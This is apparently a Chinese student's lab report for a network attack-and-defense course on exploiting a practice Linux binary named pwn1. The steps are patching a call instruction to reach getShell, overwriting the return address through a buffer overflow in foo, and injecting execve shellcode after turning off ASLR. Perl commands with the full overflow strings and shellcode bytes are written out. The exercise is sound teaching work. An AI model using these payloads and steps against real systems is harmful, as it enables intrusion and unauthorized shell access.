2018-2019 20165226 网络对抗 Exp1 PC平台逆向破解

一、逆向及Bof基础实践说明

****
1.1 实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

三个实践内容如下：

- 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

- 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

- 注入一个自己制作的shellcode并运行这段shellcode。

这几种思路，基本代表现实情况中的攻击目标:

- 运行原本不可访问的代码片段

- 强行修改程序执行流

- 以及注入运行任意代码。

1.2 基础知识

NOP, JNE, JE, JMP, CMP汇编指令的机器码
- NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90）
- JNE：条件转移指令，如果不相等则跳转。（机器码：75）
- JE：条件转移指令，如果相等则跳转。（机器码：74）
- JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移 Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
- CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
Linux基本操作
- objdump -d：从objfile中反汇编那些特定指令机器码的section。
- perl -e：后面紧跟单引号括起来的字符串，表示在命令行要执行的命令。
- xxd：为给定的标准输入或者文件做一次十六进制的输出，它也可以将十六进制输出转换为原来的二进制格式。
- ps -ef：显示所有进程，并显示每个进程的UID,PPIP,C与STIME栏位。
- |：管道，将前者的输出作为后者的输入。
- >：输入输出重定向符，将前者输出的内容输入到后者中。
我们通过输入chmod +x pwn1将pwn1文件加高亮

返回目录

二、直接修改程序机器指令，改变程序执行流程

****
> 知识要求：Call指令，EIP寄存器，指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
> 学习目标：理解可执行文件与机器指令
> 进阶：掌握ELF文件格式，掌握动态技术

使用objdump -d pwn1将pwn1反汇编，得到以下代码

可以看出80484b5: e8 d7 ff ff ff call 8048491 <foo>这条汇编指令，在main函数中调用位于地址8048491处的foo函数，e8表示“call”，即跳转。

如果我们想让函数调用getShell，只需要修改d7 ff ff ff即可。根据foo函数与getShell地址的偏移量，我们计算出应该改为c3 ff ff ff。

修改具体如下：

vi pwn1进入命令模式
输入:%!xxd将显示模式切换为十六进制
在底行模式输入/e8d7定位需要修改的地方，并确认
进入插入模式，修改d7为c3
输入:%!xxd -r将十六进制转换为原格式

使用:wq！保存并退出
反汇编查看修改后的代码，发现call指令正确调用getShell：

返回目录

三、通过构造输入参数，造成BOF攻击，改变程序执行流

> 知识要求：堆栈结构，返回地址学习目标：理解攻击缓冲区的结果，掌握返回地址的获取进阶：掌握ELF文件格式，掌握动态技术

反汇编，具体操作参考上一步骤，此处不再赘述
该可执行文件正常运行是调用函数foo，这个函数有Buffer overflow漏洞。读入字符串时，系统只预留了一定字节的缓冲区，超出部分会造成溢出，我们的目标是覆盖返回地址。尝试发现，当输入为以下字符时已经发生段错误，产生溢出：

使用gdb进行调试：

由此可得eip的值为ASCII的5，即输入字符串的“5”的部分发生溢出，我们可以尝试将5的部分换成12345678进一步确认：

由此看来1234覆盖了堆栈的返回地址。因此，我们可以尝试将这四个字符替换成getShell的内存地址并输给20165226pwn2,20165226pwn2就会运行getshell。

反汇编查看getshell的内存地址：

由此可知应输入11111111222222223333333344444444\x7d\x84\x04\x08

使用perl命令构造文件perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
使用十六进制查看指令xxd查看input文件。\0a表示换行
将input的输入通过|管道符，作为20165226pwn2的输入

返回目录

四、注入Shellcode并执行

> - hellcode就是一段机器指令（code）
- 通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），所以这段机器指令被称为shellcode。
- 在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

首先使用apt-get install execstack安装execstack
修改一下设置

root@kali:~/20165226/exp1# execstack -s 20165226pwn3

root@kali:~/20165226/exp1# execstack -q 20165226pwn3

X 20165226pwn3

root@kali:~/20165226/exp1# more /proc/sys/kernel/randomize_va_space

2

root@kali:~/20165226/exp1#  echo "0" > /proc/sys/kernel/randomize_va_space

root@kali:~/20165226/exp1# more /proc/sys/kernel/randomize_va_space

0

采用RNS方法攻击buf（retaddr+nop+shellcode）perl -e 'print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode
在第一个终端用(cat input_shellcode;cat) | ./20165226pwn3注入攻击，回车后保持这个终端不动，打开另一个终端
另一个终端
- ps -df |grep 20165226pwn3查看其进程号为3292
- gdb调试进程

启动gdb，attach 3292调试此进程

通过设置断点disassemble foo来查看注入buf的内存地址

使用break *0x080484ae设置断点，并输入c（continue）继续运行。在20165226pwn3进程正在运行的终端敲回车，使其继续执行。再返回调试终端，使用info r esp查找地址。

使用x/16x 0xffffd2ec查看其存放内容，看到了01020304，就是返回地址的位置。根据我们构造的input_shellcode可知，shellcode就在其后，所以地址是 0xffffd2f0。

回到第一个终端
- 输入命令perl -e 'print "A" x 32;print "\xf0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
- 再用 (cat input_shellcode;cat) | ./20165226pwn3 命令次执行程序，攻击成功！

返回目录

五、问题与思考

- 问题1：ebd7找不到
![](https://img2018.cnblogs.com/blog/1047870/201903/1047870-20190311232448517-112338069.png)

问题1解决方案：输入/e8 d7（注意中间空格）
问题2：在另一个终端中无法查看显示20165226pwn3这个进程的进程号
问题2解决方案：

仔细比对步骤，发现写好的代码未成功通过管道方式对文件中foo函数进行覆盖，重新输入(cat input_shellcode;cat) | ./pwn2
问题3：出现以下情况
问题3解决方案；两个终端分别运行时将20165226pwn3文件提前结束运行了，当第一次使用cat语句执行后应该保持不动。

返回目录